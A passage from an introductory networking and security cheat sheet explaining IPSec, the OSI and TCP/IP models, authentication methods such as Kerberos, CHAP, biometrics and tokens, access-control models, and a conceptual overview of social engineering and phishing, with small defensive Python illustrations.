
Network 101 Cheat Sheet

What is a Client Computer? A client is a computer in your network on which a network user
performs some network activity, for example downloading a file from a file server or browsing
the intranet or Internet. A network user normally uses a client computer to perform his or her
day-to-day work.

What is a Server Computer? A client computer establishes a connection to a server computer
and accesses the services installed on it. A server is not meant for a network user to browse
the Internet or do spreadsheet work. A server computer is installed with an appropriate
operating system and related software so that it can serve network clients with one or more
services, continuously and without interruption.

An Operating System (also known as "OS") is the most important set of software programs
loaded into any computer-like device, initially by a bootstrap program. The operating
system controls almost all the resources in a computer, including networks, data storage, the
user and password database, peripheral devices, etc.
The IPSec (Internet Protocol Security) protocol suite is a set of network security protocols
developed to ensure the confidentiality, integrity, and authenticity of data traffic over a
TCP/IP network. IPSec secures network traffic by providing data confidentiality, data
integrity, sender and recipient authentication, and replay protection.
Some network threats mitigated by using IPSec are:
1) Data corruption in transit
2) Data theft in transit
3) Password and account theft
4) Network-based attacks

IPSec (Internet Protocol Security) protects network data traffic (the primary goals of
IPSec) in the four ways listed below.

1) Confidentiality: The data in network traffic must be available only to the intended recipient.
In other words, the data MUST NOT be available to anyone other than the intended recipient.
IPSec provides confidentiality by encrypting the data during its journey.

2) Integrity: The data in network traffic MUST NOT be altered while on the network. In other
words, the data received by the recipient must be exactly the same as the data sent from the
sender. IPSec provides data integrity by using hashing algorithms.

3) Authentication: The sender and the recipient MUST PROVE their identity to each other. IPSec
provides authentication services by using digital certificates or pre-shared keys.

4) Protection against replay attacks: In a replay attack, an attacker captures legitimate
network traffic between a sending device and a receiving device (often by spying on the link)
and later reuses the captured information for fake authentication, fake authorization, or to
duplicate a transaction. (Replay attacks are sometimes confused with man-in-the-middle
attacks, but they are a distinct technique.) IPSec protects against replay attacks by using
sequence numbers built into the IPSec packets; using these sequence numbers, IPSec can
identify packets it has already seen.
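The sequence-number check described above can be sketched in Python. This is an illustrative simplification: real IPSec uses the sliding-window algorithm defined in RFC 4303, and the class name and window size here are invented for the example.

```python
class ReplayWindow:
    """Toy anti-replay check, loosely modeled on the IPSec sliding window."""

    def __init__(self, window_size=64):
        self.window_size = window_size
        self.highest = 0    # highest sequence number seen so far
        self.seen = set()   # sequence numbers accepted inside the window

    def accept(self, seq):
        if seq <= self.highest - self.window_size:
            return False    # too old: fell outside the window, reject
        if seq in self.seen:
            return False    # duplicate: a replayed packet, reject
        self.seen.add(seq)
        self.highest = max(self.highest, seq)
        # Drop state that has fallen out of the window
        self.seen = {s for s in self.seen if s > self.highest - self.window_size}
        return True

win = ReplayWindow()
print(win.accept(1))   # True  - first time this number is seen
print(win.accept(2))   # True
print(win.accept(1))   # False - replayed packet is rejected
```

The key idea is simply that a receiver remembers which sequence numbers it has already accepted, so a copied packet cannot be accepted twice.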

IPSec can secure end-to-end IP traffic (known as Transport mode) or traffic between two
gateways (known as Tunnel mode).

Transport mode: In Transport mode, only the data payload of the IP datagram is secured by IPSec.
IPSec inserts its header between the IP header and the upper-layer headers.

Tunnel mode: In Tunnel Mode, entire IP datagram is secured by IPSec. The original IP Packet is
encapsulated in a new IP packet.
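The difference between the two modes can be visualized with a toy byte-layout sketch. The tags below are placeholders, not real header formats: actual ESP also carries an SPI, a sequence number, padding, and an integrity check value.

```python
# Illustrative only: each bracketed tag stands in for a real protocol header.
ip_header   = b"[IP:A->B]"
tcp_segment = b"[TCP][payload]"

# Transport mode: the IPSec header sits between the original IP header and
# the upper-layer data, so only the payload is protected.
transport_mode = ip_header + b"[ESP]" + tcp_segment

# Tunnel mode: the entire original packet is encapsulated inside a new
# IP packet (e.g. between two hypothetical gateways G1 and G2).
tunnel_mode = b"[IP:G1->G2]" + b"[ESP]" + ip_header + tcp_segment

print(transport_mode.decode())  # [IP:A->B][ESP][TCP][payload]
print(tunnel_mode.decode())     # [IP:G1->G2][ESP][IP:A->B][TCP][payload]
```

Note how in Tunnel mode the original source and destination addresses are hidden inside the protected payload, which is why Tunnel mode suits gateway-to-gateway VPNs.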

IPSec is integrated at Layer 3 of the OSI model and hence provides security for almost all
protocols in the TCP/IP protocol suite. As discussed above, the IPSec (IP Security) protocol
suite is a set of network security protocols, consisting of different protocols/technologies that
provide confidentiality, integrity, authentication, and anti-replay capabilities.

Following are the three main components of IPSec.

1) Internet Key Exchange (IKE) Protocol: Internet Key Exchange (IKE) is an IETF protocol
with two versions: the older IKEv1 and the newer IKEv2. IKE is used to establish a Security
Association (SA) between two communicating IPSec devices.

2) Encapsulating Security Payload (ESP): IPSec uses ESP (Encapsulating Security Payload) to
provide data integrity, encryption, authentication, and anti-replay functions for IPSec VPNs.
Cisco IPSec implementations use DES, 3DES, and AES for data encryption.

3) Authentication Header (AH): IPSec uses Authentication Header (AH) to provide Data
Integrity, Authentication, and Anti-Replay functions for IPSec VPN. Authentication Header
(AH) does not provide any Data Encryption. Authentication Header (AH) can be used to provide
Data Integrity services to ensure that Data is not tampered during its journey.
Seven Layers of Open Systems Interconnection (OSI) Model
Layer 1. Physical Layer
The first layer of the seven-layer Open Systems Interconnection (OSI) network model is the
Physical layer. Physical circuits are created at the Physical layer, which describes the
electrical or optical signals used for communication. The Physical layer is concerned only
with the physical characteristics of electrical or optical signaling techniques, including the
voltage of the electrical current used to transport the signal, the media type (twisted pair,
coaxial cable, optical fiber, etc.), impedance characteristics, the physical shape of the
connector, synchronization, and so on. The Physical layer is limited to the processes needed
to place communication signals onto the media and to receive signals coming from the media.
The lower boundary of the Physical layer is the physical connector attached to the
transmission media. The transmission media themselves do not belong to the Physical layer;
they stay outside its scope and are sometimes referred to as "Layer 0" of the OSI model.
Layer 2. Datalink Layer
The second layer of the seven-layer OSI network model is the Data Link layer, which resides
above the Physical layer and below the Network layer. The Data Link layer is responsible for
the validity of data transmitted between directly connected nodes (hop to hop). It is
logically divided into two sublayers: the Media Access Control (MAC) sublayer and the
Logical Link Control (LLC) sublayer.
The MAC sublayer determines the physical addressing of hosts. It maintains MAC addresses
(physical device addresses) for communicating with other devices on the network. MAC
addresses are burned into network cards and constitute the low-level address used to
determine the source and destination of network traffic. MAC addresses are also known as
physical addresses, Layer 2 addresses, or hardware addresses.
The LLC sublayer is responsible for synchronizing frames, error checking, and flow control.
Layer 3. Network Layer
The third layer of the seven-layer OSI network model is the Network layer, which is
responsible for managing logical addressing information in packets and delivering those
packets to the correct destination. Routers, special-purpose devices used to build the
network, direct packets using information stored in a table known as the routing table: a
list of available destinations kept in the router's memory. The Network layer works with
logical addresses, which uniquely identify a computer on the network and at the same time
identify the network that the computer resides on. Network layer protocols use the logical
address to deliver packets to the correct network. The logical addressing system used at the
Network layer is the IP address.
IP addresses are also known as logical addresses or Layer 3 addresses.
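Python's standard ipaddress module can illustrate how a single logical address carries both a network part and a host part. The address and prefix below are arbitrary example values:

```python
import ipaddress

# A logical (Layer 3) address identifies both the network and the host.
iface = ipaddress.ip_interface("192.168.10.25/24")

print(iface.network)              # 192.168.10.0/24 - identifies the network
print(iface.ip)                   # 192.168.10.25   - identifies the host
print(iface.ip in iface.network)  # True - the host belongs to that network
```

Routers only need the network part to forward a packet toward the right network; the host part matters on the final hop.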
Layer 4. Transport Layer
The fourth layer of the seven-layer OSI network model is the Transport layer, which handles
transport functions such as reliable or unreliable delivery of data to the destination. On
the sending computer, the Transport layer is responsible for breaking the data into smaller
segments, so that if any segment is lost during transmission, it can be sent again. Missing
segments are detected through acknowledgments (ACKs) returned by the remote device as it
receives the segments. On the receiving system, the Transport layer is responsible for
reassembling all of the segments and reconstructing the original message.
Another function of the Transport layer is TCP segment sequencing: a connection-oriented
service that takes TCP segments received out of order and places them in the right order.
The transport layer also enables the option of specifying a "service address" for the
services or application on the source and the destination computer to specify what
application the request came from and what application the request is going to.
Many network applications can run on a computer simultaneously and there should be
some mechanism to identify which application should receive the incoming data. To make
this work correctly, incoming data from different applications are multiplexed at the
Transport layer and sent to the bottom layers. On the other side of the communication, the
data received from the bottom layers are de-multiplexed at the Transport layer and
delivered to the correct application. This is achieved by using "Port Numbers".
The protocols operating at the Transport layer, TCP (Transmission Control Protocol) and
UDP (User Datagram Protocol), use a mechanism known as port numbers to enable
multiplexing and de-multiplexing. Port numbers identify the originating network application
on the source computer and the destination network application on the receiving computer.
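The port-based de-multiplexing described above behaves, in essence, like a lookup table from destination port to application. The handler functions and port assignments below are hypothetical stand-ins for real network applications:

```python
# Hypothetical handlers standing in for real network applications.
def web_server(data):
    return "web got " + data

def dns_server(data):
    return "dns got " + data

# The transport layer delivers incoming segments to applications by
# destination port number - effectively a lookup table like this one.
listeners = {80: web_server, 53: dns_server}

def demultiplex(dst_port, data):
    handler = listeners.get(dst_port)
    if handler is None:
        return f"no application listening on port {dst_port}"
    return handler(data)

print(demultiplex(80, "GET /"))    # web got GET /
print(demultiplex(53, "query A"))  # dns got query A
```

A real operating system does the same lookup when a segment arrives: the destination port selects which socket (and therefore which application) receives the data.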
Layer 5. Session Layer
The Session layer is the fifth layer of the seven-layer Open Systems Interconnection (OSI)
model, positioned between the Transport layer and the Presentation layer. The Session layer
is responsible for establishing, managing, and terminating connections between applications
at each end of the communication.
In the connection establishment phase, the service and the rules (who transmits and when,
how much data can be sent at a time etc.) for communication between the two devices are
proposed. The participating devices must agree on the rules. Once the rules are established,
the data transfer phase begins. Connection termination occurs when the session is
complete, and communication ends gracefully.
In practice, Session Layer is often combined with the Transport Layer.
Layer 6. Presentation Layer
The position of Presentation Layer in seven layered Open Systems Interconnection (OSI)
model is just below the Application Layer. When the presentation layer receives data from
the application layer, to be sent over the network, it makes sure that the data is in the
proper format. If it is not, the presentation layer converts the data to the proper format.
On the other side of communication, when the presentation layer receives network data
from the session layer, it makes sure that the data is in the proper format and once again
converts it if it is not.
Formatting functions at the presentation layer may include compression, encryption, and
ensuring that the character code set (ASCII, Unicode, EBCDIC (Extended Binary Coded
Decimal Interchange Code, which is used in IBM servers) etc) can be interpreted on the
other side.
For example, if we select to compress the data from a network application that we are
using, the Application Layer will pass that request to the Presentation Layer, but it will be
the Presentation Layer that does the compression.
Layer 7. Application Layer
The Application layer is the seventh and top-most layer of the seven-layer Open Systems
Interconnection (OSI) network model. Real traffic data is typically generated at the
Application layer. This may be a web request generated by the HTTP protocol, a command from
the Telnet protocol, a file download request from the FTP protocol, etc.
In this lesson you have learned the seven layers of the Open Systems Interconnection (OSI)
model and their functions. The top-most layer is the Application layer, and the bottom-most
layer is the Physical layer.

Comparison between seven layer OSI and four layer TCP/IP Models
As we can see from the figure above, the Presentation and Session layers are not present in
the TCP/IP model. Note also that the Network Access layer in the TCP/IP model combines the
functions of the Data Link and Physical layers.
Layer 4. Application Layer
The Application layer is the top-most layer of the four-layer TCP/IP model. It sits on top
of the Transport layer and defines TCP/IP application protocols and how host programs
interface with Transport layer services to use the network.
The Application layer includes all the higher-level protocols such as DNS (Domain Name
System), HTTP (Hypertext Transfer Protocol), Telnet, SSH, FTP (File Transfer Protocol),
TFTP (Trivial File Transfer Protocol), SNMP (Simple Network Management Protocol),
SMTP (Simple Mail Transfer Protocol), DHCP (Dynamic Host Configuration Protocol), X
Windows, RDP (Remote Desktop Protocol), etc.
Layer 3. Transport Layer
Transport Layer is the third layer of the four layer TCP/IP model. The position of the
Transport layer is between Application layer and Internet layer. The purpose of Transport
layer is to permit devices on the source and destination hosts to carry on a conversation.
Transport layer defines the level of service and status of the connection used when
transporting data.
The main protocols included at Transport layer are TCP (Transmission Control Protocol)
and UDP (User Datagram Protocol).
Layer 2. Internet Layer
The Internet layer is the second layer of the four-layer TCP/IP model, positioned between
the Network Access layer and the Transport layer. The Internet layer packs data into packets
known as IP datagrams, which contain source and destination address (logical address, or IP
address) information used to forward the datagrams between hosts and across networks. The
Internet layer is also responsible for routing IP datagrams.
Packet-switching networks depend on a connectionless internetwork layer; this layer is the
Internet layer. Its job is to allow hosts to insert packets into any network and have them
travel independently to the destination. Packets may arrive at the destination in a
different order than they were sent; it is the job of the higher layers to rearrange them
before delivering them to the proper network applications operating at the Application
layer.
The main protocols included at Internet layer are IP (Internet Protocol), ICMP (Internet
Control Message Protocol), ARP (Address Resolution Protocol), RARP (Reverse Address
Resolution Protocol) and IGMP (Internet Group Management Protocol).
Layer 1. Network Access Layer
Network Access Layer is the first layer of the four layer TCP/IP model. Network Access
Layer defines details of how data is physically sent through the network, including how bits
are electrically or optically signaled by hardware devices that interface directly with a
network medium, such as coaxial cable, optical fiber, or twisted pair copper wire.
The protocols included in Network Access Layer are Ethernet, Token Ring, FDDI, X.25,
Frame Relay etc.
The most popular LAN architecture among those listed above is Ethernet. When Ethernet
operates on shared media, it uses an access method called CSMA/CD (Carrier Sense Multiple
Access with Collision Detection) to access the media. An access method determines how a host
places data on the medium.
In the CSMA/CD access method, every host has equal access to the medium and can place data
on the wire when the wire is free of network traffic. When a host wants to place data on
the wire, it first checks the wire to find out whether another host is already using the
medium. If there is traffic already on the medium, the host waits; if there is none, it
places the data on the medium. But if two systems place data on the medium at the same
instant, the signals collide and the data is destroyed. Data destroyed during transmission
must be retransmitted: after a collision, each host waits for a small, random interval of
time and then retransmits.
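The decision a host makes in each round can be sketched as a simplified CSMA/CD step. This is an illustration only: it ignores real-world details such as the exponential growth of the backoff range after repeated collisions.

```python
import random

def try_transmit(medium_busy, other_host_transmits):
    """One round of simplified CSMA/CD for a single host.

    Returns 'wait', 'sent', or a 'collision ...' message with a random backoff.
    """
    if medium_busy:
        return "wait"                   # carrier sense: medium already in use
    if other_host_transmits:
        backoff = random.randint(0, 7)  # illustrative backoff slot count
        return f"collision (retry after {backoff} slots)"
    return "sent"

print(try_transmit(medium_busy=True,  other_host_transmits=False))  # wait
print(try_transmit(medium_busy=False, other_host_transmits=False))  # sent
```

The random backoff is what makes it unlikely that the same two hosts collide again on their retry.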

What is authentication?
Authentication is the process that allows the sender and receiver of information to validate
each other. If the sender and receiver cannot properly authenticate each other, there is no
trust in the activities or information provided by either party. Authentication can involve
highly complex and secure methods or can be very simple; the simplest form is the transmission
of a shared password between the entities wishing to authenticate each other. Today's
authentication methods use one or more of the factors below.

1) What you know

An example of this type of authentication is a password. The simple logic here is that if you
know the secret password for an account, you must be the owner of that account. The problems
associated with this type of authentication are that the password can be stolen, someone
might read it if you wrote it down, and anyone who comes to know your password might tell
someone else. If you use a simple dictionary word as a password, it is easy to crack with
password-cracking software.
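Because passwords can be stolen, systems should never store them in plain text. A minimal sketch of salted password hashing using Python's standard hashlib (the iteration count here is an illustrative choice, not a recommendation):

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Derive a salted, slow hash so a stolen database does not reveal passwords."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, stored_digest):
    """Re-derive the hash and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, stored_digest)

salt, stored = hash_password("correct horse")
print(verify_password("correct horse", salt, stored))  # True
print(verify_password("guess123", salt, stored))       # False
```

The salt defeats precomputed (rainbow-table) attacks, and the high iteration count slows down the dictionary cracking described above.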

2) What you have

Examples of this type of authentication are smart cards, tokens, etc. The logic here is that
if you have the smart card with you, you must be the owner of the account. The problems
associated with this type of authentication are that you might lose the smart card, it can
be stolen, or someone can duplicate it.

3) What you are

Examples of this type of authentication are your fingerprint, handprint, retina pattern,
voice, keystroke pattern, etc. The problem with this type of authentication is the chance of
false positives and false negatives: a valid user may be rejected, or an invalid user
accepted. People are also often uncomfortable with this type of authentication.

Network authentication is usually based on authentication protocols, digital certificates,
username/password, smart cards, etc. Some of the most important authentication protocols used
today are Kerberos, Challenge Handshake Authentication Protocol (CHAP), and Microsoft
Challenge Handshake Authentication Protocol (MS-CHAP). We will learn about these protocols
in coming lessons.
The Kerberos protocol is a secure protocol that provides mutual authentication between a
client and a server: the client authenticates itself to the server, and the server
authenticates itself to the client. With mutual authentication, each computer, or each user
and computer, can verify the identity of the other. Kerberos is extremely efficient for
authenticating clients in large enterprise network environments. Kerberos uses secret-key
encryption for the authentication traffic from the client, and the same secret key is used
by the Kerberos protocol on the server to decrypt the authentication traffic.

The Kerberos protocol is built on top of a trusted third party called the Key Distribution
Center (KDC), which acts as both an Authentication Server and a Ticket Granting Server. When
a client needs to access a resource on a server, the user credentials (password, smart card,
biometrics) are presented to the KDC for authentication. If the user credentials are
successfully verified, the KDC issues a Ticket Granting Ticket (TGT) to the client, and the
TGT is cached on the local machine for future use. The TGT becomes invalid when the user
disconnects or logs off the network, or when its lifetime elapses; the default lifetime is
one day (86,400 seconds).

When the client wants to access a resource on a remote server, it presents the previously
granted and cached TGT to the authenticating KDC. The KDC returns a session ticket that the
client can use to access the resource. The client presents the session ticket to the remote
resource server, and the remote server establishes the session after accepting the ticket.
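The two-step flow above (a TGT first, then a session ticket) can be sketched as a toy model. This is emphatically not real Kerberos: RFC 4120 tickets are encrypted, not merely HMAC-signed, and KDC_KEY below is a made-up stand-in for the KDC's long-term secret.

```python
import hashlib
import hmac
import json
import time

KDC_KEY = b"kdc-long-term-secret"  # invented example value

def issue_tgt(username):
    """Authentication Server step: issue a Ticket Granting Ticket."""
    body = json.dumps({"user": username, "expires": time.time() + 86400})
    tag = hmac.new(KDC_KEY, body.encode(), hashlib.sha256).hexdigest()
    return body, tag

def issue_session_ticket(tgt):
    """Ticket Granting Server step: validate the TGT, then issue a session ticket."""
    body, tag = tgt
    expected = hmac.new(KDC_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None  # forged or tampered TGT is rejected
    return "session-ticket-for-" + json.loads(body)["user"]

tgt = issue_tgt("alice")
print(issue_session_ticket(tgt))                  # session-ticket-for-alice
print(issue_session_ticket((tgt[0], "bad-tag")))  # None
```

The point of the sketch is the indirection: the client authenticates once to obtain a TGT, then reuses that TGT to obtain per-resource session tickets without re-entering credentials.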

CHAP Authentication
Challenge Handshake Authentication Protocol (CHAP) is a remote access authentication
protocol used in conjunction with the Point-to-Point Protocol (PPP) to provide security and
authentication to users of remote resources. CHAP is described in RFC 1994, which can be
viewed at http://www.rfc-editor.org/. CHAP uses a challenge method for authentication rather
than transmitting the password itself. In CHAP, the initiator sends a logon request to the
server, and the server sends a challenge back to the client. The client combines the
challenge with its shared secret, hashes the result, and sends the hash back to the server.
The server computes the same value from its own copy of the secret and, if the values match,
grants the session. If the response fails, the session is denied and the request phase
starts over.

CHAP periodically verifies the identity of the peer using a three-way handshake. This
verification is done when the link is first established and may be repeated at any time
afterwards.
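The response computation defined in RFC 1994 (an MD5 hash over the packet identifier, the shared secret, and the challenge) can be sketched in a few lines of Python. The secret value below is a made-up example:

```python
import hashlib
import os

def chap_response(identifier, secret, challenge):
    """RFC 1994: response = MD5(identifier || secret || challenge).

    The shared secret itself never crosses the wire.
    """
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

secret = b"shared-secret"  # known to both peers in advance

# Server side: send a random challenge together with an identifier.
identifier, challenge = 1, os.urandom(16)

# Client side: compute the response from the challenge and the secret.
response = chap_response(identifier, secret, challenge)

# Server side: compute the expected value and compare.
expected = chap_response(identifier, secret, challenge)
print(response == expected)  # True - session granted
```

Because each challenge is random, a captured response is useless for a later login attempt, which is how CHAP resists replay.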

Microsoft Challenge-Handshake Authentication Protocol (MS-CHAP) is the Microsoft
implementation of CHAP. There are two versions of MS-CHAP: MS-CHAPv1 and MS-CHAPv2. MS-CHAP
adds some features, such as a method for changing passwords and retrying in the event of a
failure.

Retina Pattern, Iris Scan, Fingerprint, Handprint, Voice Pattern, and Keystroke Biometric
Authentication
Each person has a set of unique characteristics that can be used for authentication, and
biometrics uses these unique characteristics. Today's biometric systems examine retina
patterns, iris patterns, fingerprints, handprints, voice patterns, keystroke patterns, etc.
However, of the biometric devices available on the market, only retina pattern, iris
pattern, fingerprint, and handprint systems are properly classified as biometric systems;
the others are better classified as behavioral systems.
Biometric identification systems normally work by obtaining a unique characteristic from
you, such as a handprint or a retina pattern, and comparing it to the specimen data stored
in the system.
Biometric authentication compares favorably with other types of authentication methods, but
users are often reluctant to use it. For example, many users fear that a retina-scanner
authentication system may damage their vision. False positives and false negatives are also
a serious problem with biometric authentication.
Retina Pattern Biometric Systems
Everybody has a unique retinal vascular pattern. A retina pattern biometric system uses an
infrared beam to scan your retina, examines the unique characteristics of the retina, and
compares that information with the stored pattern to determine whether access should be
allowed. Some biometric systems also perform iris and pupil measurements. Retina pattern
biometric systems are highly reliable, but users are often wary of retina scanners because
they fear the scanner will blind or injure their eyes.
Iris Scans Biometric Systems
An iris scan verifies identity by scanning the colored part of the front of the eye. Iris
scanning is easier on the user and very accurate.
Fingerprints Biometric Systems
Fingerprints have been used in forensics and identification for a long time, and each
individual's fingerprints are unique. Fingerprint biometric systems examine the unique
characteristics of your fingerprints and use that information to determine whether or not
you should be allowed access.
In theory, a fingerprint scanner works as follows: the user's finger is placed on the
scanner surface, a light flashes inside the machine, the reflection is captured by a sensor,
and the captured image is analyzed and verified against the original specimen stored in the
system. The user is allowed or denied access based on the result of this verification.
Handprints Biometric Systems
As with fingerprints, everybody has unique handprints. A handprint biometric system scans
the hand and fingers, and the captured data is compared with the specimen stored for you in
the system. The user is allowed or denied access based on the result of this verification.
Voice Patterns Biometric Systems
Voice Patterns Biometric Systems can also be used for user authentication. Voice Patterns
Biometric Systems examine the unique characteristics of user’s voice.
Keystrokes Biometric Systems
Keystroke Biometric Systems examine the unique characteristics of user’s keystrokes and use
that information to determine whether the user should be allowed access.

What is token authentication?


Token technology is another method that can be used to authenticate users. Tokens are
physical devices that generate a changing code which can be used to assure the identity of
the user. Tokens provide a very high level of authentication.

There are different types of tokens. One type is a small device with a keypad for keying in
values. When the user tries to log in, the server issues a challenge containing a number;
the user keys this number into the token card, and the card displays a response. The user
sends this response to the server, which calculates the result it expects to see from the
token. If the numbers match, the user is authenticated.

Another type of token is based on time. This type of token displays numbers that change at
fixed intervals. At authentication time, the user keys in the current time-based value; if
it matches the value the server has calculated, the account is authenticated and the user is
allowed access.
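A time-based token can be sketched as a TOTP-style computation: both the token and the server derive a code from a shared secret and the current time window. This is a simplified illustration of the approach standardized in RFC 6238, with a made-up secret value:

```python
import hashlib
import hmac
import struct
import time

def token_code(secret, timestamp, step=30, digits=6):
    """Derive a short numeric code from a shared secret and a time window."""
    counter = int(timestamp // step)           # same value on token and server
    msg = struct.pack(">Q", counter)           # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                 # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return code % (10 ** digits)

secret = b"example-shared-secret"
now = time.time()
# Token and server compute the same code within the same 30-second window.
print(token_code(secret, now) == token_code(secret, now))  # True
```

Because the code depends on the current time window, a captured code expires within seconds, which is what makes this kind of token resistant to replay.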
What is Multi-Factor Authentication?
In multi-factor authentication, we expand on the requirements of traditional single-factor
authentication by using another factor in addition to the traditional password. For example,
most single-factor methods use only a password; a multi-factor method can tighten
authentication by also requiring, say, a fingerprint from a biometric scanner. Multi-factor
authentication is more secure than single-factor authentication because the additional
steps add layers of security.
What is Discretionary Access Control (DAC)?
Discretionary Access Control (DAC) allows authorized users to change the access control
attributes of objects, thereby specifying whether other users have access to those objects. A
simple form of DAC might be file passwords, where access to a file requires knowledge of a
password created by the file owner. In Linux, file permissions are the most common form of
DAC.

Discretionary Access Control (DAC) is the setting of permissions on files, folders, and
shared resources. In most operating system environments, the owner of an object (normally
the user who created it) applies the discretionary access controls. Ownership may be
transferred or controlled by root/administrator accounts. DAC is controlled by the owner or
by the root/administrator of the operating system, rather than being hard-coded into the
system.
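On a Linux system, the owner's discretionary control can be demonstrated with Python's standard os and stat modules. This assumes a POSIX filesystem, where permission bits behave as shown:

```python
import os
import stat
import tempfile

# Create a temporary file that this user owns.
fd, path = tempfile.mkstemp()
os.close(fd)

# The owner sets permissions at their own discretion - the essence of DAC:
# read/write for the owner, read-only for group and others (mode 644).
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)

mode = stat.S_IMODE(os.stat(path).st_mode)
print(oct(mode))  # 0o644
os.remove(path)
```

Nothing in the kernel forces this choice on the owner; the owner can grant or revoke access to other users at will, which is precisely the weakness the next paragraph discusses.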

The Discretionary Access Control (DAC) mechanisms have a basic weakness, and that is they
fail to recognize a fundamental difference between human users and computer programs.

What is Mandatory Access Control (MAC)?


Mandatory Access Control (MAC) is another type of access control, hard-coded into the
operating system, normally at the kernel level. MAC can be applied to any object or running
process within the operating system, and it allows a high level of control over objects and
processes. MAC can be applied to each object and can control access to that object by
processes, applications, and users. MAC cannot be modified by the owner of the object.
Mandatory Access Control (MAC) mechanism constrains the ability of a subject (users or
processes) to access or perform some sort of operation on an object (files, directories,
TCP/UDP ports etc). Subjects and objects each have a set of security attributes. Whenever a
subject attempts to access an object, an authorization rule enforced by the operating system
kernel examines these security attributes and decides whether the access can take place.
Under Mandatory Access Control (MAC), the system-wide security policy, rather than the
individual object owner, governs all interactions of software on the system.
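A label-based MAC rule can be sketched as a fixed policy check that neither the user nor the object owner can override. The levels and the "no read up" rule below are illustrative, loosely modeled on the Bell-LaPadula model:

```python
# Illustrative security labels; real MAC systems (e.g. SELinux) use far
# richer attribute sets.
LEVELS = {"public": 0, "confidential": 1, "secret": 2}

def mac_read_allowed(subject_level, object_level):
    """Kernel-enforced rule: a subject may read only objects at or below
    its own level ("no read up"). Owners cannot override this decision."""
    return LEVELS[subject_level] >= LEVELS[object_level]

print(mac_read_allowed("secret", "confidential"))  # True
print(mac_read_allowed("public", "secret"))        # False
```

The contrast with DAC is that the rule is part of the system policy: even the creator of a "secret" file cannot decide to let a "public" subject read it.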

What is Role-based Access Control (RBAC)?


Role-based Access Control (RBAC) is another method of controlling user access to file system
objects. In RBAC, the system administrator establishes roles based on functional
requirements or similar criteria; these roles have different types and levels of access to
objects. An easy way to picture RBAC is the user group concept in the Windows and GNU/Linux
operating systems. A role is defined and created for each job in an organization, and access
controls are based on that role.
In contrast to DAC or MAC systems, where users have access to objects based on their own
and the object's permissions, users in an RBAC system must be members of the appropriate
group, or role, before they can interact with files, directories, devices, etc.
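The role-as-indirection idea can be sketched with two lookup tables: users map to roles, and roles map to permissions. All role and permission names below are hypothetical examples:

```python
# Hypothetical roles and permissions, chosen only for illustration.
ROLE_PERMISSIONS = {
    "backup_operator": {"read_files", "write_backup_media"},
    "auditor":         {"read_logs"},
}
USER_ROLES = {
    "alice": {"backup_operator"},
    "bob":   {"auditor"},
}

def is_allowed(user, permission):
    """Access is granted only through role membership, never per-user."""
    roles = USER_ROLES.get(user, set())
    return any(permission in ROLE_PERMISSIONS.get(r, set()) for r in roles)

print(is_allowed("alice", "read_files"))  # True  - via the backup_operator role
print(is_allowed("bob", "read_files"))    # False - the auditor role lacks it
```

The administrative benefit is that when a person changes jobs, only the user-to-role mapping changes; the role-to-permission mapping stays intact.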

Networks are always susceptible to unauthorized monitoring and different types of network
attacks. If you have not implemented proper security measures and controls in your network,
there is a chance of network attacks from both inside and outside your network. The
following chapters explain the different types of network attacks, which are listed below.

What is a network attack?


A network attack is usually defined as an intrusion on your network infrastructure that
first analyzes your environment and collects information in order to exploit existing open
ports or vulnerabilities; it may also include unauthorized access to your resources. When
the purpose of the attack is only to learn and gather information from your system, and the
system resources are not altered or disabled in any way, we are dealing with a passive
attack. An active attack occurs when the perpetrator accesses and alters, disables, or
destroys your resources or data. An attack can be performed from outside the organization by
an unauthorized entity (an outside attack) or from within the company by an "insider" who
already has some access to the network (an inside attack). Very often the network attack
itself is combined with the introduction of malware components into the targeted systems
(malware was discussed in Part 2 of this article series).

Some of the attacks described in this article target end users (such as Phishing
and Social Engineering). These are usually not directly referred to as network attacks, but I
decided to include them here for completeness and because these kinds of attacks are
widespread. Depending on the procedures used during the attack, or the type of
vulnerabilities exploited, network attacks can be classified as follows (the provided list
is by no means complete; it introduces and describes only the best known and most widespread
attack types that you should be aware of):

What types of attack are there?


• Social Engineering - refers to psychological manipulation of people (here, employees of the
company) to perform actions that potentially lead to a leak of the company's proprietary or
confidential information, or that can otherwise damage company resources, personnel or the
company's image. Social engineers use various strategies to trick users into disclosing confidential
information, data or both. One very common technique used by social engineers is to
pretend to be someone else - an IT professional, a member of the management team, a co-worker,
an insurance investigator or even a member of a governmental authority. The mere fact that the
caller appears to be one of these people is meant to convince the victim that the person has a
right to know the confidential or otherwise protected information. The purpose of social
engineering remains the same as the purpose of hacking: unauthorized access to confidential
information, data theft, industrial espionage or environment/service disruption.

• Phishing attack - this type of attack uses social engineering techniques to steal confidential
information; the most common targets are the victim's banking account details
and credentials. Phishing attacks tend to use schemes involving spoofed emails sent to users that
lead them to malware-infected websites designed to look like real online banking websites.
The emails received by users in most cases look authentic, as if sent from sources known to the user
(very often with the appropriate company logo and localized information). These emails contain
a direct request to verify some account information, credentials or credit card numbers by
following the provided link and confirming the information online. The request is usually
accompanied by a threat that the account may be disabled or suspended if the mentioned
details are not verified by the user.

Video: Symantec Guide to Scary Internet Stuff - Phishing


Symantec Security Response provides a portal where a suspected Phishing site can be reported.
If you ever encounter a Phishing attack and have details from the spoofed email with a link to
a specific suspicious website, I highly recommend reporting it to the portal:
https://submit.symantec.com/antifraud/phish.cgi
• Social Phishing - in recent years Phishing techniques have evolved to include
social media like Facebook or Twitter; this type of Phishing is often called Social Phishing.
The purpose remains the same: to obtain confidential information and gain access to personal
files. The means of attack are a bit different though, and include special links or posts on
the social media sites that attract users with their content and convince them to click.
The link then redirects to a malicious website or similar harmful content. Such websites can mirror
legitimate Facebook pages so that an unsuspecting user does not notice the difference. The
website requires the user to log in with his real credentials; at this point the attacker collects the
credentials, gaining access to the compromised account and all data in it. Another scenario involves
fake apps: users are encouraged to download and install apps that contain
